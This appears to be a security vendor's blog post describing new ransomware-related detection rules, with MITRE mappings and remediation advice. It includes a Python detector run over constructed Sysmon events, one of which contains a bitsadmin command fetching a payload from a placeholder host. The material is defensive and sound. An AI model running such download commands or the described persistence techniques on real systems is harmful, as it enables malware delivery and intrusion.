Blumira’s incident detection engineers continue to crank out the security detection rules, automatically rolled into our platform to help you detect and respond to the latest attacks.
This week, they’ve added findings that can help you identify indicators of a potential ransomware attack in progress so you can act quickly to remediate. With these new detections, Blumira’s platform alerts you to malicious behavior, including:
Blumira’s platform can provide near real-time detection and high-confidence alerts of attacker activity in your environment, in addition to playbooks to guide you through faster remediation. We surface contextual information to help with investigations and forensics, and our security team is available if you have further questions.
As a result, you can automate your security operations to prevent and detect a ransomware data breach.
Written by Incident Detection Engineer Brian Laskowski:
Requirements: To get the security detections below, you will need to install and configure Microsoft System Monitor (Sysmon). See how in How to Enable Sysmon.
Detection: Bitsadmin Download
Bitsadmin is a utility built into the Windows operating system for downloading files. Threat actors can abuse it to download their own malicious payloads. Blumira recommends that organizations review the software that was downloaded and confirm it is approved for use in their environment.
Most recently, this technique was called out in a FireEye report on ransomware actors. After initial access, the attacker deployed additional malware, using several techniques to establish a foothold: they installed a backdoor on the target host and used BITS jobs and remote PowerShell downloads to retrieve other tools.
MITRE: T1197, Tactics: Defense Evasion, Persistence
Detection: Startup Folder LNK File
Startup folders are commonly used to run programs automatically at boot. Threat actors can take advantage of this behavior to achieve persistence. A common method is to place a crafted LNK file in the folder that, when run, executes the program the threat actor wants started at boot. Blumira recommends collecting the LNK file and reviewing what it executes on the system.
MITRE: T1547.001, Tactics: Persistence, Privilege Escalation
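The two detections above (Bitsadmin Download and Startup Folder LNK File) can be illustrated as simple rule logic over Sysmon process-creation (Event ID 1) and file-creation (Event ID 11) records. This is an added example and not Blumira's rule logic; the event field names follow Sysmon's, and the events themselves are constructed samples.

```python
# Added example (not Blumira's own rules): minimal detection logic for the
# Bitsadmin Download and Startup Folder LNK File findings, run over constructed
# Sysmon-style events (field names as emitted by Sysmon EID 1 and EID 11).
import re
from typing import Dict, List

# Constructed sample events; paths, users and URLs are illustrative only.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high "
                    r"http://example.invalid/payload.bin C:\Users\Public\payload.bin",
     "User": r"CORP\jdoe"},
    {"EventID": "1", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /list /allusers", "User": r"CORP\admin"},  # benign admin use
    {"EventID": "11", "Image": r"C:\Users\jdoe\AppData\Local\Temp\setup.exe",
     "TargetFilename": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows"
                       r"\Start Menu\Programs\Startup\update.lnk",
     "User": r"CORP\jdoe"},
    {"EventID": "11", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\jdoe\Desktop\notes.txt", "User": r"CORP\jdoe"},  # benign
]

# Matches a .lnk written directly into a per-user or all-users Startup folder.
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.IGNORECASE)

def bitsadmin_download(ev: Dict[str, str]) -> bool:
    """Sysmon EID 1: bitsadmin.exe invoked with a transfer/download switch (T1197)."""
    if ev.get("EventID") != "1" or not ev.get("Image", "").lower().endswith(r"\bitsadmin.exe"):
        return False
    cmd = ev.get("CommandLine", "").lower()
    return any(switch in cmd for switch in ("/transfer", "/download", "/addfile"))

def startup_lnk(ev: Dict[str, str]) -> bool:
    """Sysmon EID 11: a .lnk created inside a Startup folder (T1547.001)."""
    return ev.get("EventID") == "11" and bool(STARTUP_RE.search(ev.get("TargetFilename", "")))

RULES = {"Bitsadmin Download": bitsadmin_download, "Startup Folder LNK File": startup_lnk}

def evaluate(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per (rule, event) match, carrying the user and evidence for triage."""
    findings = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                findings.append({"rule": name, "user": ev.get("User", ""),
                                 "evidence": ev.get("CommandLine") or ev.get("TargetFilename", "")})
    return findings

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f['rule']}: user={f['user']} evidence={f['evidence']}")
```

Only the two malicious-looking samples produce findings; the `/list` invocation and the plain text file write are left alone, which is the kind of allow-listing a real rule needs to keep noise down.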
Detection: System Services: Service Execution with Lateral Movement Tools
Many penetration testing tools include a feature that mimics PsExec: they copy a file to the target over SMB and then execute it by creating a service. If you can identify the user account that initiated the service creation, that account may be compromised. Blumira recommends locating all devices the user is logged in to and considering isolating them while performing further investigation.
MITRE: T1569.002, Tactic: Execution
Detection: Default Execution Flags for Cobalt Strike
Cobalt Strike is a commercially available post-exploitation framework. While intended for use by authorized penetration testers, cracked versions of the software are abundant and its ease of use makes it a popular choice among cyber criminals. This tool has been seen used by red teams, APT actors, and ransomware threat actors.
MITRE: T1059.001, Tactic: Execution
Detection: Default Execution Flags for PoshC2
PoshC2 is an open source post-exploitation framework, meaning it is freely available to download. Threat actors typically use it once they are ready to begin moving laterally and escalate to exploiting Active Directory infrastructure. This tool has been seen used by red teams, APT actors, and ransomware threat actors.
MITRE: T1059.001, Tactic: Execution
Detection: Default Execution Flags PowerShell Empire
PowerShell Empire is an open source post-exploitation framework, meaning it is freely available to download. Threat actors typically use it once they are ready to begin moving laterally and escalate to exploiting Active Directory infrastructure. This tool has been seen used by red teams, APT actors, and ransomware threat actors.
MITRE: T1059.001, Tactic: Execution
Written by Sr. Incident Detection Engineer Bill Reyor:
Detection: Watch Folder on Linux Host Accessed
This alert is triggered when a customer-configured watch folder on a Linux host is modified or otherwise interacted with. This kind of activity is commonly associated with data exfiltration. Blumira recommends determining whether the activity was authorized and expected; if it was not, review the alert for the source user and consider initiating incident response around that potentially compromised user account.
Requirements: To get this security detection, you must configure log forwarding by integrating Linux auditd with Blumira. See how in our Linux auditd documentation.
MITRE: TA0010, Tactic: Exfiltration